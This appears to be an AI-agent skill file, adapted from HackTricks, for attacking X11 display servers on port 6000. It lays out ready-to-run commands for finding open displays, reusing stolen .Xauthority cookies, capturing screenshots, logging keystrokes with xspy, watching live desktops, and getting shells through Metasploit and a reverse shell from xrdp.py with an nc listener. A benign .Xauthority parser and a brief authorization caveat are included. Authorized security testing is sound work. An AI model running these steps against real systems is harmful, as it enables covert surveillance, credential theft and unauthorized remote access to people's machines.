Hacktricks-skills x11-pentesting

Perform X11 (X Window System) security assessments and exploitation on port 6000. Use this skill whenever the user mentions X11, port 6000, X Window System, graphical interface pentesting, or needs to enumerate/exploit unauthenticated X11 access. This includes checking for anonymous connections, capturing screenshots, keylogging, remote desktop viewing, and obtaining shells through X11 vulnerabilities.

Install: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/6000-pentesting-x11/SKILL.MD

X11 Pentesting Skill

A comprehensive skill for assessing and exploiting X11 (X Window System) vulnerabilities on port 6000.

When to Use This Skill

Use this skill when:

  • Port 6000 is open on a target and you need to assess X11 security
  • You need to check for anonymous/unauthenticated X11 access
  • You want to enumerate X11 sessions and display information
  • You need to capture screenshots from a remote X11 display
  • You want to monitor keystrokes on an X11 session
  • You need to view a remote desktop through X11
  • You're attempting to gain shell access through X11 exploits

Quick Start

# Check for open X11 access
nmap -sV --script x11-access -p 6000 <TARGET_IP>

# Verify connection
xdpyinfo -display <TARGET_IP>:0

Enumeration

Check for Anonymous Connection

Use these methods to detect if X11 allows unauthenticated access:

# Nmap script
nmap -sV --script x11-access -p 6000 <TARGET_IP>

# Metasploit scanner
msfconsole
use auxiliary/scanner/x11/open_x11
set RHOSTS <TARGET_IP>
run

Local Enumeration

The .Xauthority file in a user's home directory contains the MIT magic cookie used for X11 authorization:

# View the authority file
xxd ~/.Xauthority

# Or check XAUTHORITY environment variable
echo $XAUTHORITY

The cookie is a 128-bit key stored in plain text. To use a captured cookie:

export XAUTHORITY=/path/to/.Xauthority
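As an added illustration, not part of the original skill, a small parser for the .Xauthority record format that the xxd dump above shows as raw bytes; family numbers follow X11/Xauth.h, and the two records are constructed inline (one reusing the page's example IP 10.5.5.12):

```python
import struct

# Address families from <X11/Xauth.h> (FamilyLocal is 256, FamilyWild is 254)
FAMILIES = {0: "Internet", 6: "InternetV6", 254: "Wild", 256: "Local"}

def _read_counted(buf, pos):
    """Read one counted field: 2-byte big-endian length, then that many bytes."""
    if pos + 2 > len(buf):
        raise ValueError("truncated length field at offset %d" % pos)
    (n,) = struct.unpack(">H", buf[pos:pos + 2])
    pos += 2
    if pos + n > len(buf):
        raise ValueError("truncated data field at offset %d" % pos)
    return buf[pos:pos + n], pos + n

def parse_xauthority(buf):
    """Parse the Xauth records of an .Xauthority file into dicts.
    Each record: family (2-byte BE), then four counted fields in this
    order: address, display number, authorization name, authorization data."""
    entries, pos = [], 0
    while pos < len(buf):
        if pos + 2 > len(buf):
            raise ValueError("truncated family field at offset %d" % pos)
        (family,) = struct.unpack(">H", buf[pos:pos + 2])
        address, pos = _read_counted(buf, pos + 2)
        number, pos = _read_counted(buf, pos)
        name, pos = _read_counted(buf, pos)
        data, pos = _read_counted(buf, pos)
        if family == 0 and len(address) == 4:   # FamilyInternet stores raw IPv4 bytes
            host = ".".join(str(b) for b in address)
        else:                                   # FamilyLocal stores the hostname
            host = address.decode("latin-1")
        entries.append({"family": FAMILIES.get(family, str(family)), "address": host,
                        "display": number.decode("ascii"), "name": name.decode("ascii"),
                        "cookie_bits": len(data) * 8})   # 128 for MIT-MAGIC-COOKIE-1
    return entries

def _record(family, address, number, name, data):
    """Encode one Xauth record; used only to build the constructed sample below."""
    out = struct.pack(">H", family)
    for field in (address, number, name, data):
        out += struct.pack(">H", len(field)) + field
    return out

# Constructed sample: one local display :0 and one TCP display :1 (the page's example IP)
SAMPLE = (_record(256, b"lab-host", b"0", b"MIT-MAGIC-COOKIE-1", bytes(range(16)))
          + _record(0, bytes([10, 5, 5, 12]), b"1", b"MIT-MAGIC-COOKIE-1", b"\xaa" * 16))
```

Running parse_xauthority over the bytes of a real file (open(path, "rb").read()) lists which displays a cookie is held for and confirms the cookie length, without printing the secret itself.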

Enumerate Active Sessions

# Check active sessions
w

# Look for display information (e.g., :0, :1)
# Example output shows user on tty7 with display :0 running xfce4-session

Connection Verification

Before attempting exploitation, verify you can connect to the X11 server:

# Basic connection test
xdpyinfo -display <TARGET_IP>:<DISPLAY>

# Get window tree information
xwininfo -root -tree -display <TARGET_IP>:<DISPLAY>

# Example
xwininfo -root -tree -display 10.5.5.12:0

Screenshots

Capture screenshots from a remote X11 display:

# Capture to XWD format
xwd -root -screen -silent -display <TARGET_IP>:0 > screenshot.xwd

# Convert to PNG (requires ImageMagick)
convert screenshot.xwd screenshot.png

# Or use xwd directly with display
xwd -display <TARGET_IP>:0 -root -silent | convert - xwd.png

Keylogging

Use xspy to capture keystrokes from an X11 session:

# Install xspy if not available
# xspy is available in Kali Linux

# Start keylogging
xspy <TARGET_IP>

# Example output shows captured keystrokes including passwords

Remote Desktop Viewing

Method 1: xrdp.py

# Download xrdp.py from security research repositories
./xrdp.py <TARGET_IP>:0

Method 2: xwatchwin for Live Viewing

# First, get the window ID
xwininfo -root -display <TARGET_IP>:0

# Note the Window id (e.g., 0x45 for root window)

# Start live viewing
./xwatchwin <TARGET_IP>:0 -w <WINDOW_ID>

# Example
./xwatchwin 10.9.xx.xx:0 -w 0x45

# With verbose output and update time
./xwatchwin -v -u 100 <TARGET_IP>:0 -w 0x45

Shell Access

Metasploit Method

msfconsole
use exploit/unix/x11/x11_keyboard_exec
set RHOSTS <TARGET_IP>
set DISPLAY 0
run

Reverse Shell via xrdp.py

# Start xrdp without display mode
./xrdp.py <TARGET_IP>:0 --no-disp

# In the interface, select R-shell option

# On your local machine, start a netcat listener
nc -lvp 5555

# Enter your IP and port in the R-shell option in xrdp interface
# Click R-shell to establish reverse connection

Workflow Summary

  1. Reconnaissance: Scan for port 6000 and check for anonymous access
  2. Enumeration: Verify connection and gather display/window information
  3. Exploitation: Choose appropriate method based on access level
    • Screenshots for visual reconnaissance
    • Keylogging for credential capture
    • Remote desktop for interactive access
    • Shell exploits for command execution
  4. Post-Exploitation: Use captured credentials or established access for further operations

Tools Required

  • nmap - Port scanning and X11 detection
  • xdpyinfo - X11 display information
  • xwininfo - Window information
  • xwd - X Window Dump (screenshots)
  • ImageMagick (convert) - Image format conversion
  • xspy - Keylogging (Kali Linux)
  • xrdp.py - Remote desktop and shell access
  • xwatchwin - Live window viewing
  • Metasploit - Exploitation framework

Safety and Legal Considerations

  • Only test systems you have explicit authorization to assess
  • X11 exploitation can be detected by security monitoring
  • Captured keystrokes may include sensitive credentials
  • Document all findings for your security assessment report
